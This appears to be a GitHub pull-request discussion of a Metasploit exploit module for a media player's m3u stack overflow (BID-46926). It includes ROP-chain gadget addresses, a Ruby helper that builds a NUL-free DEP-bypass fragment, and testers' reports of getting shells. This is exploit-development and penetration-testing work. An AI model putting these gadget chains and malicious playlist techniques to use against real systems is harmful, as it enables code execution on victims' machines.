Add module for BID-46926 #2910
Conversation
0xffffec4e, # Value to negate, will become 0x00005041 | ||
0x6b0ce791, # NEG EAX # RETN [avcodec-52.dll] | ||
0x6b063c7d, # PUSH EAX # POP EBX # POP ESI # POP EDI # RETN [avcodec-52.dll] | ||
0x41414141, # Filler (compensate) |
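Review bot: the comment on the first line of this fragment says the value will become 0x00005041 after NEG EAX, but the two's-complement negation of 0xffffec4e is 0x000013b2; to end up with 0x00005041 the value to negate would have to be 0xffffafbf. Fix whichever is wrong (the constant or the comment) so the chain's documented intent matches what NEG EAX actually produces, and double-check the gadget that follows still receives the size you meant.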
I'm sure this works fine, but could you please randomize this a little bit? Usually this is how we do it:
# Returns an integer that's used as a 4-byte ROP junk (or compensator, whatever it's called)
def junk
rand_text_alpha(4).unpack("V").first
end
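The two points raised so far, the NEG EAX trick for placing a value that would otherwise contain NUL bytes and the randomized filler, as an added example in plain Ruby. This is not the PR's module or Metasploit's Rex code: the NEG EAX and PUSH EAX gadget addresses are copied from the fragment above, the helper names, the bad-character set and the stand-in for rand_text_alpha are assumptions.

```ruby
# Added example, not code from the PR or from Metasploit.
# Demonstrates (1) encoding a value for a NEG EAX gadget so the bytes that
# land in the file are NUL-free, and (2) a NUL-free randomized filler dword.

BADCHARS = "\x00".b  # assumed bad-character set for this m3u payload

# Two's-complement negation of a 32-bit value: the dword that NEG EAX turns
# back into +target+ once it is in EAX.
def neg_encode(target)
  (-target) & 0xffffffff
end

# Encode and verify: the value must round-trip through NEG and, packed
# little-endian as it would be in the file, must contain no bad characters.
def neg_encode_checked(target, badchars = BADCHARS)
  enc = neg_encode(target)
  raise "NEG round-trip failed" unless ((-enc) & 0xffffffff) == target
  bad = [enc].pack("V").bytes & badchars.bytes
  raise format("encoded 0x%08x contains bad chars: %p", enc, bad) unless bad.empty?
  enc
end

# Four random alphabetic bytes read as a little-endian dword; stands in for
# Rex's rand_text_alpha(4).unpack("V").first. Alpha bytes are never 0x00, so
# the filler can never introduce a NUL.
ALPHA = (("a".."z").to_a + ("A".."Z").to_a).freeze
def junk
  Array.new(4) { ALPHA.sample }.join.unpack1("V")
end

# The same fragment as in the PR, built with a checked constant and a
# randomized filler (addresses from avcodec-52.dll as quoted in the review).
def build_neg_fragment(target)
  [
    neg_encode_checked(target),  # value to negate
    0x6b0ce791,                  # NEG EAX # RETN
    0x6b063c7d,                  # PUSH EAX # POP EBX # POP ESI # POP EDI # RETN
    junk,                        # filler (compensate)
  ].pack("V*")
end

if __FILE__ == $PROGRAM_NAME
  frag = build_neg_fragment(0x000013b2)
  puts frag.unpack("V*").map { |d| format("0x%08x", d) }.join(" ")
  puts "NUL-free: #{frag.bytes.none?(&:zero?)}"
end
```

Running neg_encode_checked on a target such as 0x00010000 raises, because its negation 0xffff0000 still packs with two NUL bytes; that is the case the check exists for, and a module should fail loudly there rather than ship a truncated chain.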
So. Good news and bad news for you. The good news: I got a shell while testing this exploit:
The bad news: I only get a shell when I drag and drop the m3u file to the interface. If I first go to "Playst" -> "Add File" and add the m3u file to the list, then double-click on the m3u file, it will crash. Haven't looked into the root cause of that yet, but I'm guessing it just requires a different memory layout. So how did you test yours?
I am testing it by clicking on that little something in the top left corner which brings up the menu, then I choose File -> Open or just simply press Ctrl+O and select the file. I did not try the scenario you mention.
@wchen-r7, I have made the modifications you mentioned. |
Just verifying some scenarios here:
Yup, this scenario works for me.
This works for me, too. So apparently the only scenario that doesn't work is when you first bring up the playlist menu and load the malicious file from there.
And you also mentioned drag & drop as a working scenario, so that counts for three. The fourth scenario (loading via the playlist menu) seems to be a different issue and not just a different memory layout, I mean there is no stack overflow there... In this scenario the program attempts to iterate through the playlist. If I use a correct and existing URL the app plays the file, but if I break the address by changing only one character, it crashes. I took a look at the source and the crash occurs when it attempts to check the protocol in the 'filename' (which would be our URL entry), but that is actually nulled out, so it crashes.
This PR attempts to rescue a module which I found in the unstable branch, see the original feature request. This module is a complete rewrite with DEP bypass functionality. The vulnerable app here can be downloaded from Exploit-DB.
Test run results below: